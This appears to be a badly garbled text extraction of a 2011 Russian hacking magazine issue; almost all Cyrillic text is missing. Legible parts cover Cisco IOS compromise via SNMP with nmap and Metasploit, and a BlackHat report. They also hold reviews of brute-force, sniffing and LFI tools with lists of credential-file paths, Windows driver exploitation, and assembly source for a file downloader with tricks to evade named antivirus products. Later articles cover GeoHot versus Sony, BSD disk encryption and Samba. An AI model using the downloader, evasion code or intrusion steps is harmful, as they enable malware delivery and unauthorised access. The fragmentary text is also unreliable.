IOS, Remote Buffer Overflow...
--,

Cisco IOS. IOS. ,
, ,
Cisco IOS. , ,
, , , . , SNMP, Telnet, SSH, HTTP HTTPS.

. Finger, ,
060
SIP H.323,
.
, , SNMP. ,
SNMP . ,
SNMP . Simple Network Management
Protocol
. ,
,
SNMP-
, , SNMP
.
, SNMP
, SNMP
X 04 /147/ 2011
. 1 SNMP Community Scanner
. 2
.
Cisco IOS SNMP , .
Telnet
SNMP. SNMP
nmap. -,
,
. nmap
SNMP SNMP-sysdescr.
nse snmp-brute.nse.
, ip_with_snmp.txt.
, , DVD. ,
? , ,
IP-, bgp.he.net Prefixes v4 my_telecom.txt.
nmap :
nmap -sU -n -P0 -v -p 161 --script=snmp-sys.nse -iL my_

telecom.txt
-sU , SNMP UDP ,

UDP-;
161 161- ;
-v ;
-n DNS ( ,
);
-P0 .
, GUI . .bat- , nmap
, .
.
, - :
172.154.10.34 Cisco IOS Software, c7600rsp72043_
rp Software (c7600rsp72043_rp-ADVIPSERVICESK9-M),
Version 12.2(33)SRD2, RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Wed 20-May-09 2 System uptime: 117 days,
7:11:43.12 (1013470312 timeticks)
X 04 /147/ 2011
, ?
Metasploit. , :
Metasploit Framework,
Metasploit Pro.
Cisco IOS HTTP.
, ,
. CVE-20000945 Interface
Manager Cisco IOS .

Cisco IOS -.
CVE-02001-0537 , , 15
HTTP.
-.
Metasploit Framework
:
1. /auxiliary/scanner/http/cisco_device_manager
2. /auxiliary/scanner/http/cisco_ios_auth_bypass
Metasploit Express Metasploit Pro Cisco

IOS HTTP- .

.
,
HTTP. HTTP

Telnet SSH. Metasploit Express
Metasploit Pro
HTTP
Cisco IOS. Metasploit Pro Metasploit Framework
( nmap snmpbrute.nse) SNMP brute force tool, ,
,
, . SNMP, Metasploit
, SNMP,
, / .
. Metasploit Framework:
061
: 3
msf > msfrpcd S U msf P 123
SNMP Community Scanner readwrite (c. .1).

(. 2).
TFTP- (. 3). NAT
IP-, ,
.
, , (c. 4).
Metasploit Express
Metasploit Pro Cisco
IOS. SNMP-
. ,
, Metasploit Pro
TFTP
. SNMP
,
.
- . , ,
, ,
SNMP-. : public@ES0 private@ES0,
Cisco.
062
, , Telnet
SSH. Cisco IOS
( , ).
,
SSH ,
Telnet . Metasploit Framework

,
. Metasploit Express
Metasploit Pro
Telnet- SSH-,

, .
.
,

. , ,

.
,
Telnet- SSH- Cisco IOS,
, Metasploit
Express Metasploit Pro,
IOS ,
enable .
X 04 /147/ 2011
: 4
enable , , .
, , .
Metasploit
. ,

. , .
Cisco IOS ,
?
, VTY-, enable, VPN, SSL-
Wi-Fi. Metasploit
,
.
Metasploit Express Metasploit Pro , ,
.
Cisco SNMP, , VTY- ciscorules!,
knownonly ,

. ,
,
. X 04 /147/ 2011
, Cisco,

.

Cisco
Motorola
Phenoelit
-
Cisco 1600 Motorola 68360 QUICC ( Blackhat
2002 ).

IOS Cisco
IOS.
, .

Motorola, .
Cisco ( phenoelit.de). ,
Cisco,
- Metasploit Framework
.
z
063
WELCOME
TO BLACKHAT!

security-event,
10 000 .

BlackHat.
, -,
, , , - BlackHat.
, , , .
,
- . BlackHat,
,
, ,
, - .
-
-, Response
Team Oracle, ,
. , ,
, ,
. )
. -
064
.
, . ,
. BlackHat
. , ($3500 ),
,
, . , ,
( ),

. , , ,
- , Mac Hacking Class
RFID, Access Control & Biometric Systems.
Pentesting With backtrack
X 04 /147/ 2011
GPRS EDGE
Attack Research, , ,
BlackHat. Tactical
Exploitation , . ,
,
( ,
).
,
. -
: ,
, .
, .
: ,
, ( ).
, , , . , BlackHat Las-Vegs
-, . ,
. , :
Cyber-attacks to SAP platforms: The Insider Threat
;
Peach Fuzzing ;
Hardware Reverse Engineering: Access, Analyze and
Defeat;
How to Hack Large Companies and Make Millions;
The Mac Exploit Kitchen
.
, , , , ,
. ,
,
.
, , Rapid7, Nessus, IOActive,
CoreSecurity . , ,
Metasploit Nessus (,
, XL ). HBGarry,
, . ,
,
Forensics-. ,
.
. ,
BlackHat,
.
X 04 /147/ 2011
GPU CPU
,
, .
: , - : ? ?.
, :
, , , .
, , , .
, ,
. ,
! .
. ,
,
. ,
, ,
WPA2, . . ,
, WPA,
... , , -
, . , ,
WPA2. ,

, Amazon.

Core i7 ,
GeForce 295 GTX.
GPU- Amazon:
22GB RAM
2 x Intel Xeon X5570
2 x NVIDIA Tesla Fermi M2050
$2.10/
$16 , GPU-,
400 000 PMK ( WPA) , , PC. ,
,
, - . -,
, !

: Stale
pointers are the new black ( ,
dangling pointers, double frees uninitialized memory),
Kernel Pool Exploitation on Windows 7 (
). , .
065
, ,
.
. , ,
. , , -,
.
, , ,
Linux - , ,
Mac OS, Android, BlackBerry .
, , , .
, , . Popping Shell on
A(ndroid)RM Devices
-
ARM- (, ). , Webkit (
, Google Chrome) $35000-39000,
, -
. SMS GSM-
. , :
, . , RET2LIBC ARM- ,
, (
, ),
0-day webkit, Motorola
Droid. - . , ,
, . ,
cancel .
. , , ,
. ,
URL-, !

The Apple Sandbox.
, Jit-Spray,
.
. ,
, ,
, Apple Sandbox (XNU Sandbox) ,
. Apple, ,
.
066
-
, .
, , .
,
! +500
.

practical attack against GPRS/EDGE/UMTS/HSPA mobile data
communications. , -
. , ,
, , GSM- (Practical Cellphone Spying. Chris Paget. DEF CON 18 July
2010). , ,
(OpenBTS)
,
.
, GPRS- EDGE- ip.access
nanoBTS IP-.
,
, Cellphone Jammer (-
UMTS/HSPA). ,
, ,
.
.
BTS-
. ,
, , . ,
, .
, iPhone/iPad -.
,
SMS, .
, UMTS ,
,
UMTS-,
GSM, .

, -
. The Baseband
Apocalypse .
GSM-, GSM-,
.
,
Wi-Fi , .
X 04 /147/ 2011
Symantec,
#1
-
. , ,
, . ,
ASLR, NX- ( Infineon XMM6180,
IPhone 4). ,
Qualcomm Infineon,
iPhone HTC Dream.
, , ,
.
,

,
. ,
:).
,
(, ,
).
(, ),
.
.
Layer7 DOS? .
, HTTP(S), SMTP,
FTP.
. 2009
POST-, .
, ,
.
? Content-Length HTTP- , . , Content-Length = 1000.
, , = 1000,
1 , ,
.
- ! , 20 000 IP-,
, .
owasp.org/index.php/OWASP_
HTTP_Post_Tool. DDOS
( ,
). ,

, .
.
X 04 /147/ 2011
Symantec,
#2
BlackHat XSS.
Trustwave. Trustwave
Spider Labs.
, , , . ,
, .
, . ,
Hacking the Fast Lane:
security issues with 802.11p, DSRC and wave
.
, , : . -,
Trustwave XSS: Street Fight
XSS-
, Mod Security (
).
Our favorite XSS filters and how to bypass them ,
, ,
Mod Security.
.
. -
Enterprise,
. - :
(MS Office );
(CRM, -, , );
enterprise (ERP, BPM, PLM ).
enterprise- . ERP (Enterprise Resource Planning ) SAP.
. ,
ERP- 1:. 1
, SAP ,
. .
2006 ,
SAP. 2007
067
, BlackHat
C
( Cybsec)
BlackHat RFC,
SAP. 2009
. ,
2007-2008 SAP , 2010 ! 2011 , ,
. ,
, web- SAP-
. , ,
BlackHat,
. ,
. , ,
(, ). , , , SSO, HTTP-.
, , ,
2006 ! SAP SSO
, ,
. ,
, ERP- .
,
ERP-, , google-;
ActiceX- ;
,
,
, , , .
-
, . , , ,
,
068
,
Metasploit egyp7

.
,

-,

OpenEdge.
,
,

( )
, . -
! ,
, . , .
.
-,
. , -,
. - ,
Metasploit Oracle.
- Oracle Application Server
Oracle Fusion Middleware,
- Oracle E-business Suite.
, - ,
( ), Research@
dsecrg.com, , , ,
Blackhat :). z
X 04 /147/ 2011
5
BlackHat 2011
AutoRun:

Windows,
(
). , ,
Stuxnet USB, Windows.
,
USB-
AutoRun . ?
,
USB- , , , .
security- . (
) ,
,
. Windows,
,
Linux, USB- .

GPRS/EDGE/UMTS/HSPA
,
, $10 000.
,
(Rogue BTS),
.
.
GPRS EDGE (2G) , ,
GPRS- EDGE- .
, , UMTS- HSPA
(3G)-.
GPRS/EDGE,
2G-, 3G-.
, USB?
!
The Universal Serial Bus (USB) - ,

.
X 04 /147/ 2011
iPhone, BlackBerry, Android ..

USB-,

.
,
. , USB-
, Human Interface Device (HID),
. ,
. , , , USB-
,
data-.
LiveCD

.
, ,
,
.. LiveCD ( !), .
.
. ?
, ,
LiveCD,
.
, Tor,
LiveCD-
.
Mac
- , Mac
, , ? !
Black Hat

Mac. - , ()
(
), . ,
.
Mac OS X Snow Leopard,
IDA Pro.
069

(icq 884888, snipper.ru)
X-TOOLS
: Lamescan 3
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: redsh
: Extra ICQ Password

Changer mass
: Zdez Bil Ya
Radmin !
ICQ
Radmin Lamescan. .
, Lamescan 3 Radmin 2.x
/ Radmin 3.x.
:

.
,
.

;,
( ,
,
).
(0,
)
.

newpass__.txt,
;_;_.
, ,
,
Request
failed. Check the old and new password2.

.

: avtuh.
ru/2010/04/26/extra-icq-password-changermass.html.
;
Radmin 2.x 3.x
;

,

;
/
;
CSV
HTML;
viewer
(/
);
SOCKS TCP;

Radmin;
;

.

IpGeoBase
HIMIKAT.

, .
070
: 0x4553-Intercepter
: ares
0x4553Intercepter ares.

:
ICQ/IRC/AIM/
FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/
HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/
VNC/MYSQL/ORACLE
ICQ/AIM/
JABBER/YAHOO/MSN/GADU-GADU/IRC/MRA
MAC- ;
,
;

eXtreme-;
pcap-
- ;

RPCAP ;
ARP poison;
eml POP3 SMTP;
ARP DHCP (
DHCP ).

,

intercepter.nerf.ru
.
: UnShortURL
: avtuh
, , ,
.
, .
,

, ,
. .
UnShortURL
X 04 /147/ 2011
.

.
. Link
/ .

:
ad.vu, adjix.com, alturl.com,
b23.ru, bit.ly, budurl.com,
clck.ru, cli.gs, fly2.ws, goo.gl,
idek.net, is.gd, moourl.com,
murl.kz, nn.nf, nsfw.in, ow.ly,
pnt.me, shorl.com, sn.im,
snipurl.com, tiny.cc, tinyurl.com,
tr.im, u.nu, url.ie, w3t.org,
www.x.se, yep.it, yourls.org
(,
).
.
: avtuh.ru/2010/06/30/unshorturl.html.
: DepositFiles Brute
:
depositfiles.com
,
-
depositfiles.com,
-
.

. DepositFiles
Brute.

:
:;
;
;
;
.

-
.
X 04 /147/ 2011
: lfimap
: *nix/win
: Augusto Pereyra
etc/clamav/clamd.conf
etc/clamav/freshclam.conf
etc/ca-certificates.conf
Windows
boot.ini
AppServ/MySQL/data/mysql/user.MYD
WINDOWS/system32/driversetc/hosts
WINDOWS/repair/SAM

Lfimap
,
, , LFI (local
file include).
:

( );

(windows, linux);

;

linux windows;
;
basic-
( --user --passw);
null-
(
--null);

( --output);
proxy (
--proxy).
:
python lfimap.py -t http://www.test.
com/ss.php?page=[LFI]

.
, :
Linux
var/log/httpd/access_log
proc/self/environ
proc/version
var/log/apache2/access.log
var/log/httpd-access.log
usr/localetc/apache22/httpd.conf
etc/apache2/apache2.conf
etc/httpd/conf/httpd.conf
var/log/mysqld.log
etc/mysql/my.cnf
var/lib/mysql/mysql/user.MYD
etc/inittab
etc/sysctl.conf
etc/passwd
etc/ts.conf
, lfimap

.
:ICQ Password
Recalling
: Karas

ICQ Password Recalling.
-
ICQ, (QIP, Jimm,
ICQ ),
.
,
,
.
, ,
,
, ,
UIN ,
.
:
1. ICQ
.
2. IP
( 127.0.0.1).
3. .
4. ( ,
).
5.
login.icq.com.

forum.
asechka.ru/showthread.php?t=109235. z
071
MALWARE
(stannic.man@gmail.com)
ring0-
. ,
- .
][, . , , - .
(
Windows) . . ,
: ,

,
. , , , , . ,
072
,
,

, .
?
!
Windows ,
: ,
. , , 2008 , X 04 /147/ 2011
IOCTL Fuzzer
MS08-025,

Windows XP Windows Server 2003. , win32k.
sys, , .
- ,
( Windows NT 4.0 ),
, , Windows Ring-0. ,
,

, win32k.sys
.
win32k.sys
. (
), 0-day . WinAPI RtlQueryRegistryValues,

EntryContext
.

, .
,
-
r0-,
. ,
- ,
, . ,
X 04 /147/ 2011
-
, IRP-, ,
-
ring3 ring0.

,

. , -. ,

. ,
-
.

,
IoCreateDevice.
-. -

(, , , ),
(,
). ,
, DRIVER_OBJECT,
IRP- (IRP I/O
Request Packet).
DRIVER_OBJECTMajorFunction,
IRP-
:
DVD
dvd
DVD-

Windows

Esagelab
.
HTTP://WWW
links
:
j00ru.vexillium.org;
ivanlef0u.tuxfamily.org.
typedef
NTSTATUS
(*PDRIVER_DISPATCH) (
__in struct _DEVICE_OBJECT *DeviceObject,
__in struct _IRP *Irp
);
073
MALWARE
- SPARK

, (CodeRed)
Solar Designer
2010
2009
2008
2005
2001
2000
2007
1988
1972
1980
1996
1990
1997
1970
1995
Bugtracke

Phrack Aleph One Smashing the Stack for Fun and Profit
Nergal's Phrack
Hovav Shacham - x86
-
DeviceObject
( ), Irp ,
:
, ,
.

.

,
, POP ESP; RET, ,

- .
,
, .
: ,
, ,

074
X 04 /147/ 2011
- . ,

? .
-,
, , (
Windows) , 12 . -,
( , )
. .
.
. ,
- , ,
Windows . Windows
(IRQL),
, .
, IRQL, , .
. , IRQL,
. ,
IRQL,

,
. , , .
( ,
),
. ,

IRQL', ( BSOD'). ,
(, ,
Windows), , ,
.
ESP, .
,
,
, ESP,
X 04 /147/ 2011
.
, ,
. : (nonpaged) , ,

. , , , .

, ,
, . ,
,
.
,
, IRQL,
.
VirtualLock,

.
, , -

.
, -
, IRP-,
, .
,
, ,
,
, , . IOCTL Fuzzer (code.google.
com/p/ioctlfuzzer),

, , ,
.
, ,
,
. z
075
MALWARE

Symantec,
McAfee Trend Micro
. ,

malware-. , .
, , ? IDC 2009 . ,
( ) .
, 20082009 . , ,
076
Symantec McAfee .
. ? ,
, Trend Micro Sophos.
! -. ,
- .
X 04 /147/ 2011
, %
($M US GAAP)
Symantec
McAfee
Trend Micro
KL
Sophos
AVG
ESET
FSecure
BitDefender
Panda
Other
Total
2360
1191
596
380
203
190
160
150
140
132
1098
6600
35,76
18,05
9,03
5,76
3,08
2,88
2,42
2,27
2,12
2,00
16,64
100,00
,
, ,
. ][ .
, .
? ,

(,
, ).
, .
, , ,
. , . ,
,
. , , ,

.

:
Symantec Norton Internet Security 2011;
McAfee McAfee Total Protection;
Trend Micro Titanium Maximum Security;
Sophos Endpoint Security and Data
Protection.
,
. :
, ( ),
.
.
- ,
FPU, MMX SSE.
,
(
DVD). Downloader . masm32v10.
:
start:
push
push
push
push
0
0
offset PathToSave
offset TargetURL
X 04 /147/ 2011
IDC
2009
push 0
call URLDownloadToFileA
push
push
push
push
push
push
call
0
0
0
offset PathToSave
offset OpenString
0
ShellExecute
push 0
call ExitProcess

API URLDownloadToFileA,
ShellExecute.
, , , :
Norton Internet Security 2011
. ,
.
,
API- :
LoadLibrary, GetProcAddress,
call reg.
:
start:
push offset urlmonStr
call LoadLibraryA
push offset downloadfunc
push eax
call GetProcAddress
push
push
push
push
0
0
offset PathToSave
offset TargetURL
DVD
dvd

. , !
077
MALWARE
. 21 42-

push 0
call eax
push offset shell32Str
call LoadLibraryA
push offset executefunc
push eax
call GetProcAddress
push
push
push
push
push
push
call
0
0
0
offset PathToSave
offset OpenString
0
eax
push 0
call ExitProcess
?
Sophos. .
, . , FPU-.
. !
push 0
push 1
fld qword ptr [esp]
mov dword ptr [esp], 0
mov dword ptr [esp + 4], 0
fst qword ptr [esp]
mov eax, [esp]
test eax, eax
jz Exit
. 0x00000000 0x00000001.
ST0
, ESP. ,
ST0 .
MOV [ESP] [ESP+4] .
: QWORD ST0
[ESP], [ESP]
EAX. , TEST EAX,
EAX .
FPU-, EAX
ExitProcess.
Sophos .
MMX .
start:
start:
xor eax, eax
finit
078
xor eax, eax

movq MM0, QWORD_VAL
push 0
X 04 /147/ 2011
AV-
SimpleDownloader
GPA Downloader
GPA Downloader
+ FPU
GPA Downloader
+ MMX
GPA Downloader
+ SSE
Symantec
McAfee
Downloader-AE
TrendMicro
MAL_DLDER
Sophos
Troj/Apher-Fam
Mal/DownLdr-AC
Mal/DownLdr-AC
Mal/DownLdr-AC
Mal/DownLdr-AC

0ffh,0ffh
start:
xor eax, eax
mov ecx, offset DQWORD_VAL
db 00fh, 10h, 01h
db 00fh, 50h, 0c0h
test eax, eax
jz Exit
. .
push 0
movq qword ptr [esp], MM0
mov eax, [esp]
test eax, eax
jz Exit
.
, FLD FST MOVQ. .
Endpoint Security and Data Protection
, . , , ,
SSE.
DQWORD_VAL db 0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,
0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,
X 04 /147/ 2011
, , :
db 00fh ? ?. :
, masm32 ( MicroSoft)
, , ,
.
MOVUPS XMM0, [ECX] MOVMSKPS EAX, XMM0. ,
,
,
. ?
MOVUPS, , . , ,
,
,
.
MOVMSKPS,
Extract Packed Single-Precision Floating-Point Sign Mask.
DWORD, XMM, ,
(32- ).
? , Sophos .
- .

.
?

,
. Sophos,
. -, ,
, ,
MOVMSKPS :).
, , : , AV-

. z
079

Mifrill (mifrill@real.xakep.ru)
GeoHot vs Sony

,
GeoHot Sony, (PlayStation 3) . , GeoHot

, , .

,
, GeoHot, .

, .
, . 21 ,
9- 1989 , .
c , GeoHot,
million75 mil. , -,
, . , , GeoHot
.
,
. 2000- ISEF
Intel International Science and Engineering Fair.
, .
ISEF 2004 The Mapping Robot.
,
,
Today Show. ,
The Googler.
( )
, GeoHot , .

Titanium Knights, .
Neuropilot , OpenEEG, -
. ISEF
2007 . I want a Holodeck
,
.
( Intel
), .
080

(Fox, CNN, NBC, CBS, G4, ABC, CNBC, BBC),
(, Forbes) IT-. , ,
PC World -10
21 .
, ,
. . (
) 2008-2009 ,
iPhone Apple, blackra1n
purplera1n.

( 17-) , , , . , ,
(
DMCA , :)),
. , , (
Dev Team, ih8sn0w chronicdev) , , . , ,
. , GeoHot
,
.
, , iPhone ( PS3)
. -
,
,
. ,
, . ,
iPhone ,
Certicell, Nissan 350Z iPhone 8 .
X 04 /147/ 2011
GeoHot ISEF 2007

GeoHot .
, , Apple , ,
, Apple , .
iOS 4.0 .
2010 ,
, , ,
, , .
Spirit,
.

, iPhone 4, :
, . GeoHot
, , ,
iOS 4.0
. , ,
,
, , .
2010, GreenPois0n,
- iPhone 4, , ,
, limera1n.
, limera1n 3GS- .

, GeoHot, , , ,
, i.
,
: Dev-Team ,
Apple A4 bootrom. ,
, .
bootrom, Apple , . Dev-Team
, , .

iOS 4.0 4.1 limera1n. ,
limera1n bootrom, .
X 04 /147/ 2011
- Sony
1 500 000
. -,
( App Store, Maps, GameCenter
Calendar, ), - . ,
Apple ,
! , : , Apple ,
, ,
Apple .
GeoHot , , (,
, ).
,
RC1b, (,
081
limera1n
,
Fail0verflow
, GeoHot
) . , , . ,
Apple-.
PS3
Sony
, .
, , , GeoHot. ,
,
, iPhone
, .
2009-
, A Real Challenge ( ).
Sony
PlayStation 3, .
USB-,
PlayStation 2, .
GeoHot ,
(22 2010 ) ,
. , PS3
Linux, , , .
Linux OtherOS. , /
, .
! 26 ,
, GeoHot : Sony
.
. Sony ,
,
OtherOS. , Slim-
082
. ,

! , , Linux OtherOS .
,
GeoHot , PlayStation 3 3.21 , ,
OtherOS. , , 3.21OO,
Slim- . , , .
, , . - ,
, 2010. , PS3 ,
.
.
( ,
- !),
GeoHot. ,
2011 homebrew ,
PS3 3.55.
, , Fail0verflow.
Sony . Chaos Communication Congress
,
,
Sony .
-
. , - GeoHot,
.

,
homebrew- 3.55. geohot.com (
X 04 /147/ 2011
iPhone, .

rootkey-),
. Sony . 21
2011 Sony Computer Entertainment America

Fail0verflow
, DMCA ( ), . (,
Sony) 27 , GeoHot

,
PlayStation 3. ,
Sony temporary restraining order
-.
.
- . -,
, -,
.
-, ,
DMCA, ,
, , ,
. , , .
,
,
, , . -, GeoHot
Fail0verflow , ,
.
Linux homebrew-, . , , PS3 .
. Sony
, .
YouTube, Twitter, Google, PayPal Slashdot,
Kickstarter Github. ? ,
.
, ,
, -
Fail0verflow YouTube! , ,
fail0verflow.com , , YouTube Facebook- ,
. Sony ,
,
.
PlayStation Network Qriocity.
X 04 /147/ 2011
: ISEF 2005
The Googler
. ,
(,
). GeoHot , Electronic Frontier Foundation.
, Sony , , ,
. ,
, GeoHot
( , ) Fail0verflow.
,

. Sony (
, DLC, PSN),
. G4, Sony
, , ?
.
, GeoHot . , ,
, .
, Sony
YouTube. ,
GeoHot
:). ,

. geohot.com , ,
, .
.

. , , ,
. - .
, ? z
083
UNIXOID
(zobnin@gmail.com)
BSD

UNIX, ,
Linux, BSD-.
, , FreeBSD OpenBSD.
BSD-
, Linux. ,
,
.
, man-
. , .
FreeBSD, 2010
:
GEOM- GELI, ( )
XTS PEFS,
. OpenBSD, -
084
softraid,
RAID-. , ,
.
GELI:
GELI FreeBSD,
,
. GELI FreeBSD- ,
.
XTS ( , XTS ,
).
X 04 /147/ 2011
, geekyschmidt.com: SVND crypto softraid,

XTS: ?
Unix-way

. ,
,
.
,

.
, ,

.
CBC (Cipher Block Chaining), XOR'
,
. CBC
,
, multiscan, watermarking .

,
,
. XTS.
GELI
split(1),
geli :
GELI
- GEOM, , -. ,
. ,
, , ,
(
GEOM GEOM', 96- z). GELI
(AES, Blowfish
3DES) , , ,
(,
, ), (
, /tmp swap). XTS, GELI
,
(
),
( GELI
loop-aes). GELI
FreeBSD,
X 04 /147/ 2011
# cat keyfile1 keyfile2 keyfile3 | geli init -K - /dev/da2
, OpenBSD
:
% sysctl -a | grep swapenc | head -n1
vm.swapencrypt.enable=1
current- FreeBSD ISO- : ftp://ftp.freebsd.org/pub/FreeBSD/

snapshots/201101/. ,
, .
GELI geom_eli,
:
# kldload geom_eli.ko
:
# echo 'geom_eli_load="YES"' >> /boot/loader.conf
(salt), -,
. :
# dd if=/dev/random of=~/ad1.key bs=64 count=1
,
:
# geli init -s 4096 -K ~/ad1.key -e AES \
-a hmac/sha512 -l 256 /dev/ad1
'-s' ( 4096 (4 ),
085
UNIXOID
FreeBSD 9.0 XTS
OpenBSD

GELI ), '-K'
, '-e' , '-a'
, '-l' .
. ,
,
(256- AES )
'-K'.
, GELI , CBC, XTS. ,
( , ).
GELI , :
(
), /etc/rc.conf /boot/loader.conf:
# geli attach -k ~/ad1.key /dev/ad1
/dev /dev/ad1.eli,
:
# dd if=/dev/random of=/dev/ad1.eli bs=64k
# newfs /dev/ad1.eli
# mount /dev/ad1.eli /mnt
GELI :
# umount /mnt
# geli detach ad1.eli
,
:
# geli attach -k ~/ad1.key /dev/ad1
# mount /dev/ad1.eli /mnt
, - ad1.key
, .
, . /boot/loader.
conf :
geli_ad1_keyfile0_load="YES"
geli_ad1_keyfile0_type="ad1:geli_keyfile0"
geli_ad1_keyfile0_name="/boot/ad1.key"
/etc/fstab ,
.eli. :
/dev/ad1.eli /home ufs rw 2 2
086
geli_devices="ad1"
geli_ad0s1g_flags="-k /etc/geli/ad1.key"
geli_ad0s1g_autodetach="NO"
GELI
,
:
# dd if=/dev/random of=/dev/ad0s1b bs=64k
# geli onetime -d ad0s1b
# swapon /dev/ad0s1b.eli
swap , . .eli swap- /etc/fstab, . :

/dev/ad0s1b.eli none swap sw 0 0
PEFS:
PEFS FreeBSD
GELI, .
fuse- encfs
(encfs.sf.net), . PEFS

root-,
, ,
.
PEFS , :
,
, fuse;
,

-;
(, , );
,
, ;
AES, Camellia Salsa20;
XTS;
;
UFS, ZFS ext2;
X 04 /147/ 2011
RAID-
- SVND
PAM- .
PEFS
fsx, pjdfstest, blogbench dbench.

UFS. GELI, PEFS
FreeBSD,
,
:
OpenBSD:

#
#
#
#
#
#
portinstall git
git clone git://github.com/glk/pefs.git pefs
cd pefs
make obj all
make install
make clean
. ( secure):
# mkdir ~/secure
PEFS . ,
vfs.usermount 1, (sysctl -w
vm.usermount=1).
# pefs mount ~/secure ~/secure
. , (
: PEFS 256- AES CTR,
):
# pefs addkey -a aes256-xts ~/secure
, :
# pefs showkeys ~/secure
:
# echo "Very private data" > ~/secure/test
# cat ~/secure/test
Very private data
# pefs unmount ~/secure
# ls -l ~/secure
X 04 /147/ 2011
OpenBSD
SVND (Safe Vnode
Disk Driver),
.
4.4, 2008 , softraid, ,
: ?
, .
, .
SVND ,
-,
.
crypto softraid RAID-,
, - . , SVND.
SVND crypto softraid ,
. , SVND. OpenBSD (, ,
BSD) - vnd(4),
, , . SVND ,

.
vnconfig(8),
. , .
dd:
# dd if=/dev/arandom of=/tmp/crypto.salt count=1
# dd if=/dev/zero of=/tmp/crypto.img bs=1m count=1024
:
# vnconfig -c -K 2000 -S /tmp/crypto.salt /dev/svnd0c \
/tmp/crypto.img
svnd0 /dev.
MBR BSD- ( , ,
/dev/svnd0c):
# fdisk -iy svnd0
# disklabel -E svnd0
087
UNIXOID
a a, w q, <Enter>. a,
:
# newfs /dev/rsvnd0a
# mount /dev/svnd0a /mnt

:
# umount /mnt
# vnconfig -u svnd0
:
# vnconfig -c -K 2000 -S /tmp/crypto.salt /dev/svnd0 \
/tmp/crypto.img
# mount /dev/svnd0a /mnt
crypto softraid .

.
OpenBSD 4.4. -.
S .
,
root- ( - 256 ), swap-
,
softraid. :
# fdisk -iy wd0
# disklabel -E wd0
a a <Enter> ,
size ( size 256M). . a b, -
(, 1G), <Enter>. a d,
<Enter>
( ),
(FS type) RAID. crypto softraid. w q.
RAID- wd0d (
),
bioctl(8):
, .
, ,
,
. ,
,
,

. , OpenBSD ,
, . <Enter> -
:
# bioctl -c C -l /dev/wd0d softraid0 && exit

.
,
.
NetBSD:
,
, NetBSD. CGD
(Cryptographic Device Driver),
,
( OpenBSD).
cgdconfig(8), . , (
) ,
- ( ). sd0:
# cgdconfig -g -o /etc/cgd/sd0 aes-cbc
cgd0, - ,
/dev/sd0:
# cgdconfig cgd0 /dev/sd0
.
:
# bioctl -c C -r 65536 -l /dev/wd0d softraid0
.
sd0. :
# /install
, wd0 . , (Use
(W)hole disk...), W .
(Use (A)uto layout...) C, disklabel.
m a ( a), <Enter>
, mount point ( mount point
/). w q.
sd0.
-RAID, , <Enter>. disklabel, a a,
256M, /altroot.
/usr, /tmp, /var,
/root, /home . RAID-. . -
088
# newfs /dev/cgd0
# mount /dev/cgd0 /mnt

cgd0:
# umount /dev/cgd0
# cgdconfig -u cgd0
, :
# cgdconfig cgd0 /dev/sd0
# mount /dev/cgd0 /mnt
BSD- . , , ,
. , . BSD,
. z
X 04 /147/ 2011
UNIXOID
iv (ivinside.blogspot.com)
,
Samba-
,
, . nc
NFS, CUPS.
Samba, .

Samba SMB/
CIFS. ,
Windows,
.
, ,
.
SMB .
( ) (
) .
( )
. ,
Arch Linux :
# pacman -S samba smbclient
090
# cp /etc/samba/smb.conf.default /etc/samba/smb.conf
# /etc/rc.d/samba start
: smbd () nmbd ( ). ,
Samba,
smbclient.
- , Dolphin Nautilus.
, ,
. smbclient , ,
.
1. smbclient , SMB-.
,
ftp.
X 04 /147/ 2011
HTTP://WWW
links
:
Samba 3.5
3.5
SMB2,
Vista/Se7en.
SMB2 ( 100
, 19)
. :
1. 100-
(timestamp
resolution). Linux-
2.6.22 glibc 2.6.
2.
CUPS.
cups encrypt.
3. Winbind
.
, wbinfo -g wbinfo -u
.

3.5.6 8
2010 .
,
,
.
2. smbtree SMB- . ,
Windows.
,
.
3. mount.cifs umount.cifs
Linux CIFS.
Linux,
CIFS. ,
mount
-t cifs, -i ( ).
Samba
smbmount smbumount, , ,
mount.cifs umount.cifs.
Samba
,
smb.conf(5).
,
,
:
X 04 /147/ 2011
smb.conf 8076

: Samba 4.0
Samba4
Samba3
Active Directory Domain Controller ( Win2k )
SMB-
Microsoft.
LDAP-, Active
Directory ; Kerberos KDC (Key
Distribution Center) ; ACL ;
(Microsoft VFS)
.
4.0
Samba-
Active Directory.
3.x,
.
4.0.0TP1
2006 . -
. 4.0.0-alpha14 24
2010 .
$ cat /etc/samba/smb.conf
[global]
;
workgroup = WRKGRP
;
security = SHARE
[myshare]
;
path = /usr/somewhere/shared
;
read only = Yes
;
(nobody)
guest ok = Yes
/usr/somewhere/shared WRKGRP .
(
), global
, ( ), ( myshare).

Samba:
samba.org;

Samba
PDC: opennet.
ru/base/net/samba_
pdc_slackware.txt.
html;

: smb-conf.ru.
INFO
info
CIFS

SMB,
Windows ,

Network Attached
Storage.
SambaTHG,
2000 -
,

.

Samba

-

Win2k3
( ITLabs).
091
UNIXOID
Nautilus:
,

printers, :
[printers]
path = /usr/spool/public
guest ok = yes
printable = yes
global
load printers = yes.
:
1. security ,
.
SHARE . USER,
. ,
.
2. hosts allow ,
. , IP- ,
150.203. IP-
150.203.0.0/16. ,
. ,
.
3. log file . : , /var/log/
samba/%m.log -
,
.
4. include .
, %m,
: include = /usr/local/samba/lib/smb.conf.%m.
5. interfaces ,
Samba. ,
lo. ,
/.
6. guest only yes, .
7. invalid users ,
.
UNIX/NIS, @ + .
8. create mask . 0744, . .
092

9. directory mask , .
10. browseable ,
.
[public]
create mask = 0400
directory mask = 0700
path = /export/public
writeable = yes
[archive]
path = /export/archive
writeable = no
browseable = no
Samba .
sockets options. , ( , )
,
.
Linux
( socket(7)). Samba :
[global]
socket options = TCP_NODELAY IPTOS_LOWDELAY
SO_RCVBUF=65536 SO_SNDBUF=65536
:
1. TCP_NODELAY . Samba
2.0 ,
30%.
2. IPTOS_LOWDELAY .
, .
TCP_NODELAY
20%.
3. SO_RCVBUF SO_SNDBUF Samba.
,
.
,
100 100 1 ,
. 100-
:
X 04 /147/ 2011
smb.conf
$ dd if=/dev/zero of=testfile count=10240 bs=10240
100 1 :
$ cat mkfiles.sh
